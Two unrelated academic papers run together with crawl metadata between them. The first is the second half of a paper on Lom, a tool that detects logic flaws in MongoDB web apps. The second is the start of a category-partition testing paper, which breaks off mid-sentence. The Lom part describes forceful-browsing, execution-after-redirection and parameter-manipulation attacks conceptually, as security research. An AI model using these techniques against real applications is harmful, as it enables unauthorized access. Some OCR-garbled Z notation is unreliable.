\Sigma_{exp}(s)$ at state $s$, we manipulate $P$ directly, i.e., values of one or more parameters will be changed so as to make the tampered input symbol not included by the expected input set at state $s$. For an unbounded constrained parameter, we modify its value from $v_{con}$ to $v_{ncon}$. For a bounded parameter, its value is changed to another value in the bounded set or $v_{outb}$. The left of Figure 6 shows an example, $P_1$ of input symbol $I_1$ is manipulated so as to generate a test input $I_{mal}$ for $s_1$. This method exhibits parameter manipulation attacks, where parameter values are manipulated for violating constraints between operations and the current state. 4.4.2 Forceful Browsing/Execution After Redirection We observe another state $s'$ which has one or more expected input symbols excluded from the expected input set of current state $s$. Input symbols at $s'$ with operation contours which are not included by the expected input symbol set of state $s$ are chosen as test input symbols for $s$, i.e., $I_{mal} \in \Sigma_{exp}(s') \setminus \Sigma_{exp}(s)$. The right of Figure 6 shows an example, the input symbols at state $s_2$ with $C_1$ and $C_2$ are selected as test inputs for state $s_1$ since they are not included by $s_1$. This method exhibits two types of attacks: 1. Forceful Browsing Attacks: One or more hidden sensitive link which should not be accessible at current state can be forcefully browsed; 2. Execution After Redirection (EAR) Attacks: The attacker seems to be blocked by the application from the web response of the page, but the sensitive MongoDB operations related to the page can still be successfully run on back-end MongoDB. These EAR attacks, which only manipulate the data stored in MongoDB, violate the state secretly. 4.5 Output Evaluation We denote the output symbol generated after the test input $I_{mal}$ being delivered into the application at state $s$ as $O_{test}$. The output evaluation will determine whether $O_{test}$ belongs to the blank output set. Since the blank output symbol means that the application refuses to accept the operation thus if back-end MongoDB trigger the operation of the test input, $O_{test}$ falls out of the blank output set. We collect the traces during the testing, after all the test inputs are delivered and the traces are gathered, we analyze each interaction in the traces to examine whether each test operation has been triggered or not. If a test operation is performed, we recognize its related test input as a potential logic flaw. 5 Implementation We implement a prototype system Lom for discovering logic vulnerabilities within MongoDB-based web applications. As Figure 7 shows, Lom has three major components, including Trace Collector, Specification Analyzer and Testing Engine. These components are corresponding to three phases: trace collection, specification inference and testing. 5.1 Phase I: Trace Collection Trace Collector, which collects the communication between the web application / MongoDB and the client when users navigate through the application during attack-free sessions, is implemented in our research by utilizing the open source network protocol analyzer Wireshark. 5.2 Phase II: Specification Inference Specification Analyzer is executed in Phase II to derive both the partial Mealy FSM and the testing specification. Symbolizer first transforms collected traces (in Phase I) into symbolized session logs. Then, session logs are used by the Mealy FSM Analyzer module to derive the partial FSM, resulting in two files: StateProfile, which characterizes the mapping between input/output symbols at each state and DriverSpec, which records the transitions between the set of application states, as well as the input symbols that trigger the transitions. Finally, StateProfile is analyzed by TestSpec Generator to generate the testing specification, which includes both a set of test input symbols for each state and their related output symbols for evaluation. 5.3 Phase III: Testing Testing Engine is executed in Phase III to test whether the application has logic vulnerabilities, based on the above derived profiles and specifications. It will produce test web requests from test inputs (by Web Request Generator), deliver them into the application and evaluate the test traces for logic flaw identification (by Output Evaluator). Testing Controller is the core module that takes charge of the entire testing procedure. It first loads TestSpec and other profiles and checks the current application state. If the test of the current state is not completed, it retrieves the next available test input symbol, delegates Request Generator to generate a concrete web request and submit to the application. After it receives the web response, it will wrap up all the necessary information and send it to Output Evaluator for evaluation, where logic vulnerabilities, if exist, will be reported. If the test of the current state is completed, i.e., no test inputs are left, Testing Controller will move to the next available test state. It will consult State Driver, which loads DriverSpec and keeps track of the transition graph of the application, to get the path leading to the next test state. The path computed by State Driver is essentially the shortest path from the current state to the target state (i.e., a sequence with minimum number of input symbols), which will be instantiated by Request Generator and trigger the state transition step by step to the target state. This mechanism is desirable, since we cannot directly drive the application into our desired abstract state. For the example application, after we have tested state s1 for the regular user, we have to first log out (i.e., move to state s0) and log in as an administrator to test state s2. If all the states have been fully tested, the testing procedure is finished. One key challenge we need to address is how to instantiate abstract input symbols into concrete web requests with meaningful parameters. In Phase II, when we profile web requests, we also infer the value type (e.g., number, literal string) of each parameter. When Request Generator tries to generate the concrete value for a parameter, it checks its value type and randomly generates a value of that type or retrieve a value from a pre-loaded value store (i.e., InputProfile). In particular, Request Generator includes Login Helper module, which helps Testing Engine successfully log into the application. Login Helper requires the user to provide a LoginProfile file, which specifies the input symbol that represents the login request and at least one set of legitimate user credential, e.g., username and password, for each type of user, e.g., regular user, administrator. 6 Evaluation We choose a set of interactive MongoDB-based web applications for evaluating our prototype system Lom. We deploy all web applications on a 3.30GHz Intel core i3-2120 Linux server with 4GB RAM. To facilitate trace collection, we build user simulators for each application based on Selenium WebDriver. We first identify user privileges and their corresponding atomic actions by following navigation links. All of the atomic actions can be recognized as intended functions by the web application designers due to each of them follows the navigation paths under normal situation implemented by the designer. Therefore the correctness can be guaranteed. Then, the simulator performs a random sequence of atomic actions automatically with different privileges and users, each user will run all the atomic actions under his state at least once. Our inference is performed through dynamic analysis, where the web application is executed under the constraint of navigation paths. This constraint has been applied in several existing approaches [5, 12] and shown to be effective and general to cover a large number of web applications. Lom first runs in Phase I and Phase II to collect traces and infers the application logic specification. The statistics of collected traces and inferred FSMs are shown in Table 1, including the number of files, collected web requests, MongoDB requests, states, input symbols. Then, Lom generates the testing specification and launches the testing procedure against each web application. It constructs test web requests and sends them to the application. Testing Evaluator then evaluates the test inputs based on the collected test traces. One feature of Lom is that it also gives concrete attack vectors and evidences for further inspection. Table 2 shows the testing results, including the number of test inputs generated by each method, flagged attacks and false positives. We also report the sum of real attacks (true positives) and vulnerable web pages. Note that these two numbers can be different, because a web page may have one or more unexpected operations which can be triggered under different states. In the following, we describe the details of logic flaws we identify from each web application. As Table 2 shows, 31 vulnerable web pages are discovered with no false positive. 6.1 Analysis of Results Table 1 Summary of Traces and Inferred FSM <table> <thead> <tr> <th>Web Application</th> <th>File</th> <th>Web Request</th> <th>MongoDB Request</th> <th>State</th> <th>Input</th> </tr> </thead> <tbody> <tr> <td>MongoBlog</td> <td>41</td> <td>371</td> <td>1165</td> <td>2</td> <td>24</td> </tr> <tr> <td>QuickBlog</td> <td>15</td> <td>336</td> <td>346</td> <td>3</td> <td>11</td> </tr> <tr> <td>SimpleNote</td> <td>21</td> <td>437</td> <td>493</td> <td>3</td> <td>10</td> </tr> <tr> <td>ProductShow</td> <td>8</td> <td>65</td> <td>25</td> <td>2</td> <td>2</td> </tr> </tbody> </table> Table 2 Summary of Testing Results <table> <thead> <tr> <th>Web Application</th> <th>Method</th> <th>Test Inputs</th> <th>Flagged Attacks</th> <th>False Positives</th> <th>True Positives</th> <th>Vulnerable Web Pages</th> </tr> </thead> <tbody> <tr> <td>MongoBlog</td> <td>FE</td> <td>11</td> <td>10</td> <td>0</td> <td>14</td> <td>13</td> </tr> <tr> <td></td> <td>PM</td> <td>4</td> <td>4</td> <td>0</td> <td>4</td> <td>4</td> </tr> <tr> <td>QuickBlog</td> <td>FE</td> <td>21</td> <td>13</td> <td>0</td> <td>14</td> <td>10</td> </tr> <tr> <td></td> <td>PM</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>SimpleNote</td> <td>FE</td> <td>34</td> <td>18</td> <td>0</td> <td>18</td> <td>7</td> </tr> <tr> <td></td> <td>PM</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>ProductShow</td> <td>FE</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td></td> <td>PM</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>Summary</td> <td></td> <td>72</td> <td>47</td> <td>0</td> <td>47</td> <td>31</td> </tr> </tbody> </table> True Positives: i.e. the sum of real attacks. 6.1.1 MongoBlog There are three states in this web application: guest, regular user, and admin user. Regular users can post new articles, add comments under articles, edit or delete the articles or comments created by themselves. Admin users can manage all the articles and comments. Either a regular user or an admin user can mark his favorite articles. Several logic vulnerabilities are identified within this application. First, forceful browsing attacks can be applied on the application, guest users can publish and manage articles and comments as other types of users. Second, the application can be attacked by parameter manipulation, a regular user can view other user’s summary page which shows articles, comments or favorite articles of corresponding user by manipulating a parameter. 6.1.2 QuickBlog This application also has three states: guest, regular user and administrator. Only the administrator is allowed to modify all of the posts. The regular user can edit or delete his own posts. Logic flaws exist within administrative or regular users’ pages which fail to check the current application state before any database operations. Thus an attacker can forcefully browse those pages and trigger sensitive operations, a regular user can perform parameter manipulation attacks to view other regular user’s pages. 6.1.3 SimpleNote There are three states in SimpleNote: regular user, user manager and super administrator. Each regular user can only view, edit and delete his own notes. User managers can manage the profile of regular users. Super administrators have the highest privilege, they are allowed to handle all users and notes. We identify logic vulnerabilities within user managers’ and super administrators’ pages which miss the examination of current application state. These vulnerabilities allow an attacker to browse vulnerable pages directly for managing other users’ notes or profiles. 6.1.4 ProductShow ProductShow has two states: the administrator which can add new product to MongoDB from his own page, the common user which can read products’ information. An attacker can forcefully browse the administrative page due to the application does not check the current application state. 7 Conclusions In this paper, we present the first systematic black-box approach to identify logic flaws within MongoDB-based web applications. A prototype system Lom, which introduces a MongoDB operation model to support new features of MongoDB and models the application logic as a Mealy finite state machine, is implemented and evaluated to demonstrate the practical utility of our approach. With the development of web application technology, based on the method of this paper, there are several related areas, which will be the concentration of our further research, can be extended: 1. The logic flaw within other NoSQL database based web application: The NoSQL database we concentrate on now is MongoDB which is a representation of NoSQL database. Nevertheless, there are various categories of NoSQL database, e.g., columnar storage, graph storage, key-value storage, XML storage. Each kind of NoSQL database has its corresponding characteristics, these features may bring new challenges which may be worth studying. 2. Other kinds of vulnerabilities within NoSQL database based web application: The approach we present in this paper is target on logic flaws within NoSQL database based web applications. Meanwhile, our work solves the challenges brought by NoSQL database. It is worth considering whether NoSQL database will bring challenges to other security problem, such as input validation vulnerabilities. In summary, this paper makes progress on discovering logic flaws within MongoDB-based web applications and has the value of practical application. The progress also has some reference value on further research of web application security. **Shuo Wen** received his B.S. in Computer Science and Technology from Nankai University, China, in 2009. Currently, he is a Ph.D. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. His research area includes networking and distributed systems with a focus on web applications and services and cloud computing. His research goal is to provide application and data integrity and privacy for next generation networking and distributed systems. E-mail: wenshuo@mail.nankai.edu.cn (Corresponding author) **Yuan Xue** received her B.S. in Computer Science from Harbin Institute of Technology, China, in 1998 and her M.S. and Ph.D. in Computer Science from the University of Illinois at Urbana-Champaign in 2002 and 2005. Currently, she is an assistant professor at the Department of Electrical Engineering and Computer Science of Vanderbilt University. Her research area includes networking and distributed systems with a focus on wireless and mobile systems, web applications and services, clinical information system and cloud computing. Her research goal is to provide performance optimization, quality of service support, application and data integrity and privacy for next generation networking and distributed systems. Prof. Xue is a NSF CAREER Award winner. E-mail: yuan.xue@vanderbilt.edu **Jing Xu** has been a professor of Nankai University in the institute of machine intelligence since 2006. Her research fields include software engineering, software testing and information technology security evaluation. Prof. Xu is a member of China computer federation, software engineering technical committee. E-mail: xujing@nankai.edu.cn **Li-Ying Yuan** received her B.S. in Computer Science and Technology from Nankai University, China, in 2014. Currently, she is an M.S. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. Her research area includes software analysis. E-mail: yuanliying@mail.nankai.edu.cn **Wen-Li Song** received her B.S. in Computer Science and Technology from Nankai University, China, in 2013. Currently, she is an M.S. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. Her research area includes software analysis. E-mail: wenli.song@foxmail.com **Hong-Ji Yang** is a Professor in Centre for Creative Computing, Bath Spa University, Bath, England. He has taken part in many important international conference, such as International Conference on Software Maintenance, the 8th IEEE Workshop on Future Trends of Distributed Computing Systems, the 26th Annual International Computer Software and Applications conference, etc. He is also the leader of Software Evolution and Reengineering Group at the Software Technology Research Laboratory. Prof. Yang has become IEEE Computer Society Golden Core Member since 2010, also, he is a member of EPSRC Peer Review College since 2003. E-mail: hyang@dmu.ac.uk **Guan-Nan Si** received the PhD degree from Nankai University, Tianjin, China, in 2011. He is currently an assistant professor of Shandong Jiaotong University. His research interests are software engineering and software evaluating technology. E-mail:siguannan@163.com References
{"Source-Url": "http://researchspace.bathspa.ac.uk/9345/1/9345.pdf", "len_cl100k_base": 11233, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 51984, "total-output-tokens": 14473, "length": "2e13", "weborganizer": {"__label__adult": 0.000514984130859375, "__label__art_design": 0.000568389892578125, "__label__crime_law": 0.0023651123046875, "__label__education_jobs": 0.0015039443969726562, "__label__entertainment": 0.00015175342559814453, "__label__fashion_beauty": 0.0002510547637939453, "__label__finance_business": 0.0005626678466796875, "__label__food_dining": 0.0003709793090820313, "__label__games": 0.001102447509765625, "__label__hardware": 0.0014972686767578125, "__label__health": 0.0008497238159179688, "__label__history": 0.00037288665771484375, "__label__home_hobbies": 0.00016939640045166016, "__label__industrial": 0.000560760498046875, "__label__literature": 0.0004224777221679687, "__label__politics": 0.0004467964172363281, "__label__religion": 0.0003573894500732422, "__label__science_tech": 0.1455078125, "__label__social_life": 0.00017118453979492188, "__label__software": 0.0299072265625, "__label__software_dev": 0.8115234375, "__label__sports_fitness": 0.0002655982971191406, "__label__transportation": 0.0004837512969970703, "__label__travel": 0.00018799304962158203}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 60160, 0.03401]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 60160, 0.20692]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 60160, 0.8654]], "google_gemma-3-12b-it_contains_pii": [[0, 921, false], [921, 6061, null], [6061, 12189, null], [12189, 17259, null], [17259, 23723, null], [23723, 25461, null], [25461, 31377, null], [31377, 36500, null], [36500, 41035, null], [41035, 43393, null], [43393, 48893, null], [48893, 53753, null], [53753, 58759, null], [58759, 60160, null]], "google_gemma-3-12b-it_is_public_document": [[0, 921, true], [921, 6061, null], [6061, 12189, null], [12189, 17259, null], [17259, 23723, null], [23723, 25461, null], [25461, 31377, null], [31377, 36500, null], [36500, 41035, null], [41035, 43393, null], [43393, 48893, null], [48893, 53753, null], [53753, 58759, null], [58759, 60160, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 60160, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 60160, null]], "pdf_page_numbers": [[0, 921, 1], [921, 6061, 2], [6061, 12189, 3], [12189, 17259, 4], [17259, 23723, 5], [23723, 25461, 6], [25461, 31377, 7], [31377, 36500, 8], [36500, 41035, 9], [41035, 43393, 10], [43393, 48893, 11], [48893, 53753, 12], [53753, 58759, 13], [58759, 60160, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 60160, 0.05782]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
bf7f0514981100833d77f7f4be654f9c78db25e7
Using Formal Methods To Derive Test Frames In Category-Partition Testing Paul Ammann * Jeff Offutt † pammann@isse.gmu.edu ofut@isse.gmu.edu Department of Information and Software Systems Engineering George Mason University, Fairfax, VA 22030 Abstract Testing is a standard method of assuring that software performs as intended. In this paper, we extend the category-partition method, which is a specification-based testing method. An important aspect of category-partition testing is the construction of test specifications as an intermediate between functional specifications and actual tests. We define a minimal coverage criterion for category-partition test specifications, identify a mechanical process to produce a test specification that satisfies the criterion, and discuss the problem of resolving infeasible combinations of choices for categories. Our method uses formal schema-based functional specifications and is shown to be feasible with an example study of a simple file system. 1 Introduction Testing software is a standard, though imperfect, method of assuring software quality. The general aim of the research reflected in this paper is to formalize, and mechanize where possible, routine aspects of testing. Such formalization has two benefits. First, it makes it easier to analyze a given test set to ensure that it satisfies a specified coverage criterion. Second, it frees the test engineer to concentrate on less formalizable, and often more interesting tests. Specification-based testing, or black-box testing, relies on properties of the software that are captured in the functional specification, as opposed to the source code. The category-partition method [BHO89, OB88] is a specification-based test method that has received considerable attention. An important contribution of category-partition testing is the formalization of the notion of a test specification, which is an intermediate document designed to bridge the large gap between functional specifications and actual test cases. Some parts of a test specification can be derived mechanically from a functional specification. Other parts require the test engineer to make decisions or rely on experience. We wish to mechanize as many tasks as possible. In this paper, we address some important aspects of constructing a test specification that are left open in the category-partition method. Specifically, we define a minimal coverage criterion for category-partition testing, and supply a general procedure for enumerating tests that satisfy the criterion. - supply a method for deriving test cases from test scripts - supply a method of identifying and eliminating infeasible tests caused by conflicting choices. A side effect of our method is that we are sometimes able to uncover anomalies in the functional specification. This allows us to, in some cases, detect unsatisfiable (as defined by Kemmerer [Kem85]) specifications. We employ formal methods, in particular Z specifications, as a tool in our investigation of test generation. There are several motivations for using formal methods. First, some of the analysis necessary to produce a test specification has already been done for a formal functional specification, and hence less effort is required to produce a test specification from a formal functional specification. Second, using formal methods makes the determination of whether part of a test specification results from a mechanical process or from the test engineer's judgement more objective. Finally, formal methods are well suited to describing artifacts of the testing process itself. Such artifacts include parts of the test specification and actual test cases. 1.1 Related Work A variety of researchers have investigated the use of formal methods in test generation. Kemmerer suggested ways to test formal specifications for such problems as being unsatisfiable [Kem85]. In the DAISTS system of Gannon, McMullin, and Hamlet [GMH81], axioms from an algebraic specification and test points specified by a test engineer are used to specify test sets for abstract data types. Hayes [Hay86] exploits the refinement of an abstract Z specification to a (more) concrete specification to specify tests at the design level. Amla and Ammann [AA92] described a technique in which category-partition tests are partially specified by extracting information captured in Z specifications of abstract data types. Laycock [Lay92] independently derived similar results. More recently, Stocks and Carrington [SC93a, SC93b] have used formal methods to describe test artifacts, specifically test frames (sets of test inputs that satisfy a common property) and test heuristics (specific methods for testing software). 1.2 Outline of paper In section 2, we review the steps in the category-partition method. The Z constructs that we need are described in section 3; further information may be found in the Z reference manual [Spi89] or one of the many Z textbooks [Dil90, PST91, Wor92]. Section 4 defines a minimal coverage criterion for category partition testing, gives a procedure for deriving specifications that satisfy the criterion, and defines a method to produce test scripts from the resulting test specifications. Section 5 presents partial Z specifications, test specifications, test frames, and test case scripts for an example system. Finally, we summarize our results and findings in Section 6. 2 Category-Partition Method The category-partition method [BHO89, OB88] is a specification-based testing strategy that uses an informal functional specification to produce formal test specifications. The category-partition method offers the test engineer a general procedure for creating test specifications. The test engineer's key job is to develop categories, which are defined to be the major characteristics of the input domain of the function under test, and to partition each category into equivalence classes of inputs called choices. By definition, choices in each category must be disjoint, and together the choices in each category must cover the input domain. The steps in the category-partition method that lead to a test specification are as follows. 1. Analyze the specification to identify the individual functional units that can be tested separately. 2. Identify the input domain, that is the parameters and environment variables that affect the behavior of a functional unit. 3. Identify the categories, which are the significant characteristics of parameter and environment variables. 4. Partition each category into choices. 5. Specify combinations of choices to be tested, instantiate test cases by specifying actual data values for each choice, and determine the corresponding results and the changes to the environment. This paper focuses on the last step above. Each specified combination of choices results in a test frame. The category-partition method relies on the test engineer to determine constraints among choices to exclude certain test frames. There are two reasons to exclude a test frame from consideration. First, the test engineer may decide that the cost of building a test script for a test frame exceeds the likely benefits of executing that test. Second, a test frame may be infeasible, in that the intersection of the specified choices is the empty set. Recently, Grochtmann and Grimm [GG93] have developed classification trees, a hierarchical arrangement of categories that avoids the introduction of infeasible combinations of choices. The developers of the category-partition method have defined a test specification language called TSL [BHO89]. A test case in TSL is an operation and values for its parameters and relevant environment variables. A test script in TSL is an operation necessary to create the environmental conditions (called the SETUP portion), the test case operation, whatever command is necessary to observe the effect of the operation (VERIFY in TSL), and any exit command (CLEANUP in TSL). Test specifications written in TSL can be used to automatically generate test scripts. The test engineer may optionally give specific representative values for any given choice to aid the test generation tool in deriving specific test cases. The category-partition method supplies little explicit guidance as to which combinations of choices are desirable - the task is left mostly to the test engineer's judgement. In this work, we follow the spirit of the category partition method, but there are differences in our use of the technique. First, we base our derivation on formal specifications of the software, since, as has been demonstrated in a variety of papers [AA92, Lay92, SC93a, SC93b], the formality of the functional specification helps to simplify and organize the production of a test specification. Second, we do not follow the TSL syntax, but instead format exam- pies as is convenient for our presentation. Specifically, as has been done by others [SC93a, SC93b], we employ the formal specification notation to describe aspects of the tests themselves as well as to describe functional behavior. 3 Z Specifications Z is a model-based formal specification language based on typed set theory and logic. In this paper, we fo- cus our attention on Z specifications for abstract data types (ADTs). An ADT is characterized by spec- ified states and operations that observe and/or change state. In Z, both states and operations on states are de- scribed with schemas. A schema has three parts; a name, a signature to define variables, and a predicate to constrain the variables. A schema describing an ADT state has a signature whose variables define a set-based model for the ADT and a predicate that specifies invariants on the ADT. A schema describing an ADT operation has a signature that defines the inputs, outputs, state variables from the prior state, and state variables from resulting state. The predicate of an operation schema constrains the variables with preconditions and postconditions. By usual convention in Z, input variables are deco- rated by a trailing "=", and output variables are dec- ored by a trailing "\". State variables decorated by a trailing "=\" indicate the state of the variable after an operation is applied. By way of abbreviation, one schema can be included in another by using the name of the included schema in the signature of the new schema. By convention, if the included schema name is prefixed with a \$, then the new schema may change the state variables of the included schema. If an in- cluded schema name is prefixed with a \$, the opera- tion may not change the state variables of the included schema. Instances of schemas are given in the exam- pies of Section 5. A partial mapping of Z constructs to category- partition test specifications is given by Amla and Am- mann [AA92]. We briefly recap major points below: 1. Testable units correspond to operations on the ADT. 2. Parameters (inputs) are explicitly identified with a trailing "?". Environment variables (ADT state components) are the variables of the state schema. 3. Categories have a variety of sources. Some cat- egories are derived from preconditions and type information about the inputs and state com- ponents. Typically, there are additional desir- able categories that cannot be derived from the specification; the test engineer must derive these from knowledge and experience. Recent work [SC93a, SC93b] points to other sources of cate- gories in formal specifications. 4. Some categories, particularly those that are based on preconditions, partition naturally into normal cases and unusual or illegal cases. Partitions for other categories depend on the semantics of the system, and often require the test engineer's judgement. 5. To determine which combinations of choices to test, there are few general rules to be found in ei- ther the Z specifications or in the previous work in category-partition testing [BHO89, OB88]. Sup- plying a minimal set of rules by defining a cov- erage criterion is one of the contributions of the current paper. For the verification of outputs, the state invariants and postconditions are helpful. It has also been observed that Z schemas are ideal constructs for describing test frames [SC93a, SC93b]. In this case, the signature part lists the variables that make up possible test inputs and the predicate part constrains the variables as determined by the reason for the test. For example, a test frame intended to cover a statement in a program has a predicate part that gives the path expression that causes the flow of control to reach that statement. A Z schema used to describe a test frame typically describes a set of possible inputs; a refinement process must be used to select an element from the set before the test can actually be executed. If the set of possible inputs is empty, the test frame is infeasible. 4 Derivation of Test Scripts The previous category-partition work does not give a prescription for which combinations of choices should be specified as test frames. Selecting the combinations of choices used is an important problem whose solution affects the strength and efficiency of testing. In general, there is no single solution that applies in all applications, but it is nonetheless clear that some possibilities can be rejected as inadequate. In TSL specifications BHO89], a special syntax in the form of conditionals in the RESULTS sections is provided to specify combinations of choices. However, the TSL syntax only supports a way to specify combinations of choices. Although the authors suggest testing certain error conditions only once, deciding which choices to specify is left to the test engineer. Using all combinations of categories is generally inefficient, and the corresponding tests are repetitious and uninteresting. If we generate all combinations, where there are \( N \) categories and the \( k \)th category has \( i_k \) choices, then the number of resulting test frames is: \[ \prod_{k=1}^{N} i_k, \quad (1) \] which is combinatorial in cost. For example, consider a test specification with two categories \( X \) and \( Y \), where \( X \) has three choices and \( Y \) has two: **Categories:** \[ \begin{align*} &X \\ &\quad \ast P_1 \quad \ast Q_1 \\ &\quad \ast P_2 \quad \ast Q_2 \\ &\quad \ast P_3 \end{align*} \] \[ \begin{align*} &Y \\ &\quad \ast P_1 \\ &\quad \ast Q_1 \end{align*} \] Let us denote a test frame that satisfies choices \( P_i \) and \( Q_j \) by \([P_i; Q_j]\). The example specification defines six possible test frames: \([P_1; Q_1]\), \([P_1; Q_2]\), \([P_2; Q_1]\), \([P_2; Q_2]\), \([P_3; Q_1]\), and \([P_3; Q_2]\). To construct a test set, one chooses from zero to six of the possible test frames, yielding a total of \( 2^6 \) or 64 possible sets of test frames (including the empty set). Although only six decisions need to be made (whether to include each test frame), the test frames are interrelated, and so the six decisions cannot be made in isolation. Thus we are left with the question; which of these test sets should be specified? We proceed by defining a minimal metric that any reasonable selection of choice combinations should satisfy. The basic principle is that each choice should be used at least once, otherwise there is no reason to have distinguished that choice from other choices in a category. Let a set of test frames that incorporates each choice at least once be defined to satisfy the *each-choice-used* criterion. As it turns out, the each-choice-used criterion is not very useful in practice. Defining successive test frames by selecting unused choices in each category where it is possible to do so results in undesirable test sets. The reason is that a system typically has some normal mode of operation, and that normal mode corresponds to a particular choice in each category.\(^1\) Call the choice in each category that corresponds to the normal mode the *base* choice. It is useful for a tester to evaluate how a system behaves in modes of operation obtained by varying from the normal mode through the non-base choices in each category. We define the *base-choice-coverage* criterion to describe such a test set. To satisfy base-choice-coverage, for each choice in a category, we combine that choice with the base choice for all other categories. This causes each non-base choice to be used at least once, and the base choices to be used several times. The number of test frames generated to satisfy either each-choice-used or base-choice-coverage is linear in the number of choices, rather than the combinatorial number from formula 1. Thus there is no significant cost advantage of each-choice-used over base-choice-coverage, and so we adopt base-choice-coverage as our minimal coverage criterion for category partition test sets. The exact number of test frames for base-choice-coverage criterion for \( N \) categories where the category \( k \) has \( i_k \) choices is: \[ (\sum_{k=1}^{N} i_k) - N + 1. \quad (2) \] Note that satisfying base-choice-coverage does not mean that a test set is adequate for a particular application. In general, given a test set that satisfies base-choice coverage, the test engineer would want to add other useful test frames. Mechanically supplying a test set that satisfies base-choice-coverage frees the test engineer to concentrate on these additional tests. A strong argument can be made, however, that a test set that does not satisfy base-choice-coverage is inadequate. While this type of argument is not a strong as one would prefer, it is similar to the arguments supporting the use of program-based coverage criteria such as statement coverage or data-flow coverage criteria such as all-uses coverage. ### 4.1 The Derivation Procedure The following procedure creates test scripts that are based on the category-partition method. This process \(^1\)Many systems have multiple normal modes of operation, but we consider only one normal mode for simplicity here. gives a recipe for the last step of the method, and can be used to generate the TSL’s RESULTS section. 1. Create a combination matrix. A convenient way to organize the values for the inputs and environment variables in test frames is with an $N$-dimensional combination matrix, where $N$ is the number of categories and each dimension represents the choices of a category. The entries in the matrix are constraints that specify a test frame for the intersection of choices. This matrix is intended as a conceptual tool that helps describe our process, rather than something that will actually be constructed in practice. An example, explained further below, is the combination matrix for the two categories, $X$ and $Y$: $\begin{array}{c|cc} Y & Q_1 & Q_2 \\ \hline X & P_1 & 1 & 2 \\ & P_2 & 2 & 3 \\ & P_3 & 4 & 5 \\ \end{array}$ 2. Identify a base test frame. For each partitioned category and each operation, the test engineer designates one choice to be the base choice. This is typically either a default choice, or a “normal” choice as taken from an expected user profile. The base test frame is constructed by selecting the base choice from each category. In the above example, we assume that $[P_1; Q_1]$ is the base test frame. 3. Choose other combinations as test frames. The combination matrix can be used to automatically choose the remaining test frames by varying over choices in each category. In effect, we start at the base cell in the matrix, and successively choose each cell in every linear direction from the base cell. In the above example, if $[P_1; Q_1]$ forms the base frame, then we also choose $[P_1; Q_2]$, $[P_2; Q_1]$, and $[P_3; Q_1]$. 4. Identify infeasible combinations. In the combination matrix, each cell can be annotated with a number that corresponds to a setup script, or left blank if that combination is impossible. If an impossible choice (a blank cell) is reached, we shift the test frame by varying other choices until we reach a combination of choices that is possible. Since $[P_1; Q_2]$ in the above example is blank, we shift the test frame by moving $P_1$ to $P_2$ to get test frame $[P_2; Q_2]$. Note that when we shift, we shift away from the base frame. Deciding whether a combination is infeasible is equivalent to deciding whether the constraints involved can be satisfied. Although satisfiability is a hard problem, tools exist that are capable of resolving many common cases. For example, theorem proving systems can handle propositional and predicate calculus, as well as simple arithmetic properties, and hence could be used as an intelligent assistant to the test engineer. 5. Refine test frames into test cases. Each test frame represents a combination of choices, and thus is a set of candidate test inputs for that frame. To actually execute a test, an element from the test set must be chosen. Although we do not concentrate on this aspect of test generation in this paper, we do note that it is a subject of serious inquiry. For example, DeMillo and Offutt [DO91] have developed algorithms to automatically generate test cases from constraints, and Wild et al. are developing techniques to employ accumulated knowledge to refine test frames [WZFC92]. 6. Write operation commands. For each cell in the combination matrix that is chosen, the corresponding operation commands, setup commands, verify commands, and cleanup commands must be written. Although we expect that the test engineer needs to specify the actual commands, not all possible scripts are needed. Thus there is no need to enumerate the entire matrix, which is why this step comes towards the end. For many systems the cleanup command(s) are constant for the entire system and only need to be specified once, and only one verify command will be needed for each operation. Much of this step can be automated, but tools to do so are project specific rather than general purpose. 7. Create test scripts. Creating the actual test scripts is a straightforward process. For each chosen cell, the corresponding setup commands are chosen, the command is appended, then the verify and cleanup commands are attached. The commands can be given to an automated tool, which can combine them to automatically generate the actual test scripts, execute them, and provide the results to the tester. The complete generation of test scripts can be done prior to the design; in fact, any time after the functional specifications are written. By reusing the pro- procedure, it is also easy to modify the test scripts once they are created. 5 The MiStix Example We demonstrate our procedure on an example system. MiStix is based on the Unix file system, and has been used in exercises in graduate software engineering classes at George Mason University. The MiStix specification is similar to, although simpler than, the Unix file system specification developed as a Z case study in Hayes [Hay93]. There are two types of objects in the system: files and directories. The type \texttt{Name} is used to label a simple file or directory name (for example, the MiStix file “foo”): \[ \text{[Name]} \] We denote constants of type \texttt{Name} with double quoted strings, as in the example above. Sequences of \texttt{Name} are full file or directory names (for example, the MiStix file “/usr/bin/foo”): \[ \text{FullName ::= seq Name} \] The representation chosen 